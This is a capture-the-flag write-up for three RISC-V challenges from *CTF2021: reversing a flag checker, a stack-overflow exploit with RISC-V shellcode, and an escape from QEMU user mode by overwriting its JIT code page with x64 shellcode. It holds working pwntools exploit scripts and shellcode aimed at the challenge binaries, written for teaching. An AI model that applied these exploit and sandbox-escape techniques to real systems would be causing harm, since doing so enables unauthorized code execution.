Mid Station

[*CTF2021] Favourite Architecture Challenges

Last weekend sixstar team brought a series of RISC-V challenges in their CTF. As their name suggested, I enjoy playing RISC-V challenges very much, three flags could be found in the checkpoints:

  • Favourite Architecture 0: Reverse challenge, 25 solved
  • Favourite Architecture 1: Userspace pwn challenge, read /home/pwn/flag.24 solved
  • Favourite Architecture 2: Qemu userspace escape pwn challenge, execute /readflag2. 6 solved

Recon

The challenge designer provider a zip file that can be used to build docker image.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Archive:  c11db24e682f4d4d802f4a3ca9ca76b8.zip
Length Date Time Name
--------- ---------- ----- ----
0 2021-01-16 01:01 favourite_architecture/
347 2021-01-15 23:02 favourite_architecture/Dockerfile
125 2021-01-16 00:42 favourite_architecture/README.md
204 2021-01-15 22:05 favourite_architecture/build.sh
409 2021-01-15 22:49 favourite_architecture/docker-compose.yml
6 2021-01-16 00:43 favourite_architecture/flag2
1319 2021-01-15 21:33 favourite_architecture/patch
8504 2021-01-15 22:47 favourite_architecture/readflag2
0 2021-01-15 22:56 favourite_architecture/share/
60 2021-01-15 22:42 favourite_architecture/share/entry
6 2021-01-16 00:43 favourite_architecture/share/flag
385912 2021-01-15 23:12 favourite_architecture/share/main
23771760 2021-01-15 23:12 favourite_architecture/share/qemu-riscv64
0 2021-01-15 23:12 favourite_architecture/tmp/
631 2021-01-15 23:02 favourite_architecture/xinetd
--------- -------
24169283 15 files

Generally, there are three important files:

main: riscv64 elf file

1
2
3
4
5
6
7
8
./main: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=c54b93fd63fcb530ed539bd25e4322a08324b0b7, stripped
checksec:
Arch: em_riscv-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x10000)
RWX: Has RWX segments

The riscv64 file was compiled without any mitigations.

qemu-riscv64: patched qemu userspace emulator

The qemu-riscv64 is 5.2 version of qemu userapce emulator but with the following patch, it added a whitelist to only allowed a subset of syscalls.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
diff --git a/linux-user/syscall.c b/linux-user/syscall.c
index 27adee9..2d75464 100644
--- a/linux-user/syscall.c
+++ b/linux-user/syscall.c
@@ -13101,8 +13101,31 @@ abi_long do_syscall(void *cpu_env, int num, abi_long arg1,
print_syscall(cpu_env, num, arg1, arg2, arg3, arg4, arg5, arg6);
}

- ret = do_syscall1(cpu_env, num, arg1, arg2, arg3, arg4,
- arg5, arg6, arg7, arg8);
+ switch (num) {
+ // syscall whitelist
+ case TARGET_NR_brk:
+ case TARGET_NR_uname:
+ case TARGET_NR_readlinkat:
+ case TARGET_NR_faccessat:
+ case TARGET_NR_openat2:
+ case TARGET_NR_openat:
+ case TARGET_NR_read:
+ case TARGET_NR_readv:
+ case TARGET_NR_write:
+ case TARGET_NR_writev:
+ case TARGET_NR_mmap:
+ case TARGET_NR_munmap:
+ case TARGET_NR_exit:
+ case TARGET_NR_exit_group:
+ case TARGET_NR_mprotect:
+ ret = do_syscall1(cpu_env, num, arg1, arg2, arg3, arg4,
+ arg5, arg6, arg7, arg8);
+ break;
+ default:
+ printf("[!] %d bad system call\n", num);
+ ret = -1;
+ break;
+ }

if (unlikely(qemu_loglevel_mask(LOG_STRACE))) {
print_syscall_ret(cpu_env, num, ret, arg1, arg2,

entry: launcher script

entry is a bash script to launch the challenge.

1
2
3
#!/bin/bash
exec 2>/dev/null
timeout 30 ./qemu-riscv64 main

Favourite Architecture 0

Unfortunately, my favorite reverse engineering tool ida pro still do not have support for this “favorite architecture”, but we can turn to the powerful ghidra, which already had nice support since version 9.2 released in November 2020: Ghidra: Release Notes
I was too lazy to update the new version and this challenge was finished with a developing version in August 2020, the old version is enough, and I guess the new release version should have better support for RISCV.
With the string Input the flag: we can quickly locate the main function at 0x10400, but it shows “Unknown Error” at the decompile window. Here is a little trick to work around this issue:

  1. Locate the function in which the gp value was set. In this case, is 0x101ec, this function can be decompiled automatically:
    1
    2
    3
    4
    5
    void FUN_000101ec(void)
    {
    gp = (undefined *)0x6f178;
    return;
    }

We can see that the gp value was set to 0x6f178, and this value will remain to be the same during running.
2. Press Ctrl-A in the disassembly window to select all the code, and press Ctrl-R to invoke the set register window. In this window, we can set the correct gp value.
3. Go back to the main function at 0x10400, and now it can be decompiled correctly.
The decompile result was pretty readable. With some guessing, we can identify the library functions and understanding the logic.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
undefined8 UndefinedFunction_00010400(void)
{
ulonglong uVar1;
longlong lVar2;
undefined auStack488 [192];
undefined auStack296 [256];
ulonglong uStack40;
longlong lStack32;
int iStack20;

setvbuf(PTR_DAT_0006ea28,0);
setvbuf(PTR_DAT_0006ea20,0);
setvbuf(PTR_DAT_0006ea18,0);
puts("Input the flag: ");
gets(auStack296);
uVar1 = strlen(auStack296);
/* len == 0x59 */
if (uVar1 == ((longlong)(iRam000000000006e9dc + iRam000000000006e9d8) & 0xffffffffU)) {
/* input+0x29 */
lStack32 = strdup(auStack296 + ((longlong)iRam000000000006e9d8 & 0xffffffff));
FUN_0001118a(auStack488,"tzgkwukglbslrmfjsrwimtwyyrkejqzo","oaeqjfhclrqk",0x80);
FUN_000111ea(auStack488,auStack296,iRam000000000006e9d8);
lVar2 = strcmp(auStack296,&DAT_0006d000,iRam000000000006e9d8);
if (lVar2 == 0) {
uStack40 = strlen(lStack32);
iStack20 = 0;
while( true ) {
if (uStack40 >> 3 <= (ulonglong)(longlong)iStack20) {
printf("You are right :D");
gp = (undefined *)0x6f178;
return 0;
}
FUN_000102ae(iStack20 * 8 + lStack32,&DAT_0006d060);
lVar2 = strcmp(iStack20 * 8 + lStack32,(longlong)(iStack20 * 8) + 0x6d030,8);
if (lVar2 != 0) break;
iStack20 = iStack20 + 1;
}
}
}
printf("You are wrong ._.");
gp = (undefined *)0x6f178;
return 1;
}

So after getting the input, it first checks whether the length is 0x59, and perform the verification in two steps:

  1. The input string will be processed with some kind of encryption with 0x1118a and 0x111ea, and the result will be compared with a hex string at 0x6e9d8.
  2. The last 0x30 byte of input string will be separated into 6 groups of qword, and passed to 0x102ae with a key in 0x6d060, then the result will be compared with hex string in 0x6d030.
    For the first part, we can track down 0x1118a and find some clue in 0x106ce:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    void FUN_000106ce(longlong param_1,longlong param_2,longlong param_3)
    {
    undefined4 uVar1;

    FUN_00021386(param_1 + 0x48,param_2,0x20);
    FUN_00021386(param_1 + 0x68,param_3,0xc);
    uVar1 = FUN_000105ce("expand 32-byte k");
    *(undefined4 *)(param_1 + 0x80) = uVar1;
    uVar1 = FUN_000105ce("nd 32-byte k");
    *(undefined4 *)(param_1 + 0x84) = uVar1;
    uVar1 = FUN_000105ce("2-byte k");
    *(undefined4 *)(param_1 + 0x88) = uVar1;
    uVar1 = FUN_000105ce("te k");
    *(undefined4 *)(param_1 + 0x8c) = uVar1;
    uVar1 = FUN_000105ce(param_2);
    *(undefined4 *)(param_1 + 0x90) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 4);
    *(undefined4 *)(param_1 + 0x94) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 8);
    *(undefined4 *)(param_1 + 0x98) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0xc);
    *(undefined4 *)(param_1 + 0x9c) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x10);
    *(undefined4 *)(param_1 + 0xa0) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x14);
    *(undefined4 *)(param_1 + 0xa4) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x18);
    *(undefined4 *)(param_1 + 0xa8) = uVar1;
    uVar1 = FUN_000105ce(param_2 + 0x1c);
    *(undefined4 *)(param_1 + 0xac) = uVar1;
    *(undefined4 *)(param_1 + 0xb0) = 0;
    uVar1 = FUN_000105ce(param_3);
    *(undefined4 *)(param_1 + 0xb4) = uVar1;
    uVar1 = FUN_000105ce(param_3 + 4);
    *(undefined4 *)(param_1 + 0xb8) = uVar1;
    uVar1 = FUN_000105ce(param_3 + 8);
    *(undefined4 *)(param_1 + 0xbc) = uVar1;
    FUN_00021386(param_1 + 0x68,param_3,0xc);
    gp = (undefined *)0x6f178;
    return;
    }

It looks like the key initialization function, and we can search the const “expand 32-byte k”, and found that it is from the Salsa20: Salsa20
The encryption logic is quite similar, but some magic number seems does not match the generic algorithm. But the key point here is that Salsa20 is a symmetric algorithm, we can use the same logic to decrypt the ciphertext. So I simply send the hex string at 0x6d000, which is 0x29 bytes long, and append with 0x30 \x00. Then set a breakpoint when calling strcmp to see the plaintext at the memory, it was flag{have_you_tried_ghidra9.2_decompiler_
For the second part, it turned out 0x102ae is a naive encryption function with 10 round:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
void FUN_000102ae(uint *param_1,int *param_2)
{
uint local_20;
int local_1c;
uint local_18;
uint local_14;

local_14 = *param_1;
local_18 = param_1[1];
local_1c = 0;
local_20 = 0;
while (local_20 < 0x10) {
local_1c = local_1c + -0x61c88647;
local_14 = ((local_18 >> 5) + param_2[1] ^ local_1c + local_18 ^ local_18 * 0x10 + *param_2) +
local_14;
local_18 = ((local_14 >> 5) + param_2[3] ^ local_1c + local_14 ^ local_14 * 0x10 + param_2[2]) +
local_18;
local_20 = local_20 + 1;
}
*param_1 = local_14;
param_1[1] = local_18;
gp = (undefined *)0x6f178;
return;
}

My first idea was to brute force the key because the first part of the flag suggested that it consisted of only the lower case alphabet. I even wrote a simple python script for this task, but it was too slow. Later, I realized that it was possible to reverse this function and write a decrypt function. So I wrote a simple C program to get the rest of the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdlib.h>
unsigned int key[4] = {0x1368a0bb, 0x190ace1e,0x35d8a357,0x26bf2c61};
void reverse(int tmp, unsigned int a1, unsigned int a2) {
int i = 0;
char buf[8];
while (i < 0x10) {
a2 = a2 - ((a1 >> 5) + key[3] ^ tmp + a1 ^ a1 * 0x10 + key[2]);
a1 = a1 - ((a2 >> 5) + key[1] ^ tmp + a2 ^ a2 * 0x10 + key[0]);
tmp += 0x61c88647;
i++;
}
memcpy(buf, &a1, 4);
memcpy(buf+4, &a2, 4);
printf(buf);
}

int main() {
int tmp = 0;
for (int i=0; i<0x10; i++) {
tmp += -0x61c88647;
}
reverse(tmp,0xc45087f9, 0x0703f2b2);
reverse(tmp,0x6974f43c, 0xedb4bb59);
reverse(tmp,0x0ff0b02a, 0x008520f2);
reverse(tmp,0xfdcd23dd, 0x35024875);
reverse(tmp,0xf1d7b6d3, 0x74f21be1);
reverse(tmp,0xcb2dbf12, 0xa4b453f6);
}

It printed _if_you_have_hexriscv_plz_share_it_with_me_thx:P} , so the final flag for this checkpoint is flag{have_you_tried_ghidra9.2_decompiler_if_you_have_hexriscv_plz_share_it_with_me_thx:P}

Favourite Architecture 1

Before I analyzed the vulnerability, I saw that there was a moment when more teams solved Favourite Architecture 1 than 0, so the vulnerability is independent of the verification of reversing challenge. And it is pretty obvious for a sophisticated pwner to find the gets function to receive input.

Because the binary itself does not have any mitigations, we can have many choices to achieve RCE, including the old school nop-sled technique. However, we want to get a stable trigger on the remote machine, so I spent some time to find a gadget that can hit the shellcode unconditionally. I chose to jump to 0x10442, because we can control s0, and set the argument of gets to some address on .bss, then when the main function finishes, we can pivot to bss and execute the shellcode receive from the second gets.

1
2
3
010442 93 07 84 ed       addi   a5,s0,-0x128
010446 3e 85 c.mv a0,a5
010448 ef 60 20 61 jal ra,gets undefined gets()

The exploit is not complicated:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
from pwn import *
import re

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"
env = {'LD_PRELOAD': ''}

if len(sys.argv) == 1:
p = process('./cmd')
is_remote = False
elif len(sys.argv) == 3:
p = remote(sys.argv[1], sys.argv[2])
is_remote = True

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

if not is_remote:
time.sleep(0.5)
# subprocess.call(['tmux', 'split-window', '-h', 'gdb-multiarch', '-x', '1.gdb'])

sc = open("sc.bin", "rb").read()
assert "\n" not in sc

gets = 0x16a5a
call_gets = 0x10442

data = cyclic(280) + p64(0x6f000 + 0x128)
data += p64(call_gets)
data += cyclic(504) + p64(0x6f000)

time.sleep(0.5)
sla("flag:", data)

p.interactive()
# flag1: flag{an_easy_rv64_stack_overflow_in_qemu_user}

sc.bin contains the raw shellcode and can be generated by following assmbly code, which is modified from my previous writeup: https://matshao.com/2020/05/18/DEFCON-2020-Quals-nooopsled/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# riscv64-linux-gnu-as sc.asm -o sc
# riscv64-linux-gnu-objcopy -S -O binary -j .text sc sc.bin

.section .text
.globl _start
.option rvc
_start:

#open
li a1,0x67616c66 #flag
sd a1,8(sp)
addi a1,sp,8
li a0,-100
li a2,0
li a7, 56 # __NR_open

ecall
c.mv a2,a7
addi a7,a7,7

ecall
li a0, 1
addi a7,a7,1
ecall

Favourite Architecture 2

This checkpoint is the highlight of the challenges. We are required to execute readflag2 to get the flag. We already get RCE in RISCV in the last checkpoint, but readflag2 is an x64 elf, so we need to get RCE from qemu-riscv64 to execute it.
The hint for this task is the syscall white list from the patch file, we are supposed to get RCE in qemu user space emulator with these syscalls..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
+        case TARGET_NR_brk:
+ case TARGET_NR_uname:
+ case TARGET_NR_readlinkat:
+ case TARGET_NR_faccessat:
+ case TARGET_NR_openat2:
+ case TARGET_NR_openat:
+ case TARGET_NR_read:
+ case TARGET_NR_readv:
+ case TARGET_NR_write:
+ case TARGET_NR_writev:
+ case TARGET_NR_mmap:
+ case TARGET_NR_munmap:
+ case TARGET_NR_exit:
+ case TARGET_NR_exit_group:
+ case TARGET_NR_mprotect:

I guess the purpose of this challenge is not to find some 0day in the qemu user emulator implementation, but more likely get RCE with some logic bugs. When attached gdb to qemu-riscv6i4 process and print the memory maps, we can see that there is a region with rwx property ( 0x7fffe8000000-0x7fffeffff000). It is used for the JIT code generator. And if attach gdb to the gdb stubs from qemu user emulator, the vmmap command shows that all memroy is rwx , though this result is not so convincing, it make me think of that maybe we could access the JIT code page from riscv user space. If it works, then we can write some x64 shellcode to the JIT code page and make the emulator execute it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
vmmap of qemu-riscv64
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x10000 0x6a000 r--p 5a000 0 /pwn/test
0x6a000 0x6b000 ---p 1000 0
0x6b000 0x6e000 rw-p 3000 5a000 /pwn/test
0x6e000 0x92000 rw-p 24000 0
0x4000000000 0x4000001000 ---p 1000 0
0x4000001000 0x4000801000 rw-p 800000 0
0x555555554000 0x5555559bd000 r-xp 469000 0 /pwn/qemu-riscv64
0x555555bbc000 0x555555bf8000 r--p 3c000 468000 /pwn/qemu-riscv64
0x555555bf8000 0x555555c24000 rw-p 2c000 4a4000 /pwn/qemu-riscv64
0x555555c24000 0x555555ce9000 rw-p c5000 0 [heap]
0x7fffe8000000 0x7fffeffff000 rwxp 7fff000 0
0x7fffeffff000 0x7ffff0000000 ---p 1000 0
0x7ffff0000000 0x7ffff0021000 rw-p 21000 0
0x7ffff0021000 0x7ffff4000000 ---p 3fdf000 0
0x7ffff6c43000 0x7ffff6cc4000 rw-p 81000 0
1
2
3
4
5
vmmap when connect to gdb stub provide by qemu-riscv64
gef➤ vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000000000 0xffffffffffffffff 0x0000000000000000 rwx /pwn/test

But we need to know the address of JIT code page. My first idea is checking /proc/self/map from riscv program. I wrote a simple program and compiled it as static riscv elf, then execute it with qemu-riscv64. It seems that the emulator has special logic to deal with these proc file, we could not read any emulator address from it.

1
2
3
4
5
6
10000-6a000 r--p 00000000 00:35 144454                                   /pwn/test
6a000-6b000 ---p 00000000 00:00 0
6b000-6e000 rw-p 0005a000 00:35 144454 /pwn/test
6e000-92000 rw-p 00000000 00:00 0
4000000000-4000001000 ---p 00000000 00:00 0
4000001000-4000801000 rw-p 00000000 00:00 0 [stack]

I also tried searching for JIT page pointer from 0x1000 to 4000801000, but it does not work. I noticed that there is some memory-related syscall from the whitelist, maybe we can use them to search for the JIT page address? It sounds worth trying!
I wrote a simple function to brute-force the JIT code page address with mprotect. By running the emulator several time, we find the address can be divide by 0x000004000000. Then the reason why we check the address of va+0x4000 instead of va is that we the JIT code will locate from the start of the memory page, we need to avoid the running JIT code. Otherwise, the emulator will crash.
We compile the program as static riscv elf, and it successfully gives us the address of JIT page address.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
size_t test_map() {
size_t va = 0x7f0000000000;
size_t inc = 0x000004000000;
int res;
while (1) {
res = mprotect(va+0x4000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);
if (res >= 0) {
printf("find: %lx\n", va);

break;
}
va += inc;
}
return va;
}

Then we add the x64 shellcode injection logic to test if we can hijack the control flow by writing JIT code page, we tried to inject a x64 shellcode to print “here”, and it did work.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>

void breakpoint() {
getchar();
}

// echo here shellcode
char sc[] = {0x68, 0x68, 0x65, 0x72, 0x65, 0x6a, 0x1, 0x58, 0x6a, 0x1, 0x5f, 0x6a, 0x4, 0x5a, 0x48, 0x89, 0xe6, 0xf, 0x5};

void * VA;

size_t test_map() {
size_t va = 0x7f0000000000;
size_t inc = 0x000004000000;
int res;
while (1) {
res = mprotect(va+0x4000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);
if (res >= 0) {
printf("find: %lx\n", va);
break;
}
va += inc;
}
return va;
}

int main() {
int res = 0;
int pid;
char *addr;
char buf[0x100];

memset(buf, 0x90, 0x100);
memcpy(buf+0x80, sc, 19);
addr = (char *)test_map();
fflush(0);
breakpoint();
memcpy(addr, sc, 0x100);
// memset(addr, 0xcc, 100);
return 0;
}
1
2
3
4
5
root@matthew-Virtual-Machine:/pwn# ./qemu-riscv64  ./test
[!] 80 bad system call
find: 7fc480000000
[!] 80 bad system call
hereSegmentation fault (core dumped)

Well, from this experiment, we know that we can search for the JIT code page address with mprotect, and also write x64 shellcode to the page and get RCE from the emulator. Next step is to construct RISCV shellcode for the job.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# riscv64-linux-gnu-as sc1.asm -o sc
# riscv64-linux-gnu-objcopy -S -O binary -j .text sc sc.bin
_start:

li a3, BASE
li a4, INC
li a5, 0xf000
loop:
add a0, a3, a5
li a1, 0x1000
li a2, 7
li a7, 226 # mprotect
ecall

beq a0, zero, succ
add a3, a3, a4
j loop

succ:
# try output a3
li a1, 0x6f200
sd a3, 0(a1)
li a0, 1
li a2, 0x10
li a7, 64 # write
ecall
# rwx page at a3
# read(0, a3, 0x200)
li a0, 0
li a1, 0x6f200 # x86 sc buf
li a2, 0x200

li a7, 63 # read
ecall

# copy from 0x70000 to a3
addi a3, a3, 0x200 #22c
addi a1, a1, 0x200
li a2, 0x80
copy:
ld a5, 0(a1)
sd a5, 0(a3)
addi a1, a1, -4
addi a3, a3, -4
beq a2, zero, finish
addi a2, a2, -1
j copy

finish:
li a7, 93 # exit
ecall

The assembly code works as follow:

  1. search for JIT code page with mprotect(va+0xf000, 0x1000, 7), the offset is changed from 0x4000 to 0xf000, because we found that 0x4000 does not on remote machine.
  2. receive x64 shellcode from read(0, 0x7000, 0x200)
  3. copy the x64 shellcode from 0x7000 to va, from higher address to lower address, avoiding ruin the running JIT code by accident.
    And the python exploit is like:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    from pwn import *
    import re

    context.terminal = ['tmux', 'splitw', '-h']
    context.arch = 'amd64'
    context.log_level = "debug"
    env = {'LD_PRELOAD': ''}

    if len(sys.argv) == 1:
    p = process('./cmd')
    is_remote = False
    elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])
    is_remote = True

    se = lambda data :p.send(data)
    sa = lambda delim,data :p.sendafter(delim, data)
    sl = lambda data :p.sendline(data)
    sla = lambda delim,data :p.sendlineafter(delim, data)
    sea = lambda delim,data :p.sendafter(delim, data)
    rc = lambda numb=4096 :p.recv(numb)
    ru = lambda delims, drop=True :p.recvuntil(delims, drop)
    uu32 = lambda data :u32(data.ljust(4, '\0'))
    uu64 = lambda data :u64(data.ljust(8, '\0'))
    info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

    if not is_remote:
    time.sleep(0.5)
    # subprocess.call(['tmux', 'split-window', '-h', 'gdb-multiarch', '-x', '1.gdb'])
    pid = subprocess.check_output(['pidof', 'qemu-riscv64'])
    pid = pid.strip()
    subprocess.call(['tmux', 'split-window', '-h', 'gdb', 'attach', pid])

    def update_sc():
    subprocess.call(["./build_sc.sh"])

    update_sc()
    sc = open("sc.bin", "rb").read()
    assert "\n" not in sc

    gets = 0x16a5a
    call_gets = 0x10442

    data = cyclic(280) + p64(0x6f000 + 0x128)
    data += p64(call_gets)
    data += cyclic(504) + p64(0x6f000)
    # data += p64()

    time.sleep(0.5)
    sla("flag:", data)

    sl(sc)
    time.sleep(0.5)
    x86_shellcode = asm(shellcraft.linux.execve("/readflag2") + shellcraft.linux.exit())
    # x86_shellcode = asm(shellcraft.amd64.infloop())

    payload = "\x90"*0x100 + x86_shellcode
    payload.ljust(0x200, "\x00")
    se(payload)
    p.interactive()
    #flag{qemu_user_s4ndb0x_is_dangerous}

This will give us the last flag.

References